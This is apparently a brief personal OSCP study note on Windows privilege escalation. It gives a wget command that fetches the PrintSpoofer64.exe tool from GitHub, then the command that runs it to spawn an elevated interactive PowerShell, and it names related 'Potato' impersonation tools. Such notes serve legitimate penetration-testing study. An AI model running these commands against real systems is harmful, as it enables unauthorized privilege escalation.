Szwochm/OSCP-Prep/OSCP-Notes/Windows-Priv-Esc.md

 Get newest version of Print Spoofer

 wget https://github.com/itm4n/PrintSpoofer/releases/download/v1.0/PrintSpoofer64.exe
 You can also compile from source code on that repo, but it was taking too long, journey for another day

+Run PrintSpoofer to spawn a powershell .\PrintSpoofer64.exe -i -c powershell.exe

+-c is command, -i is to interact with it

+Other Se Priv  escalation tools: RottenPotato, SweetPotato, or JuicyPotato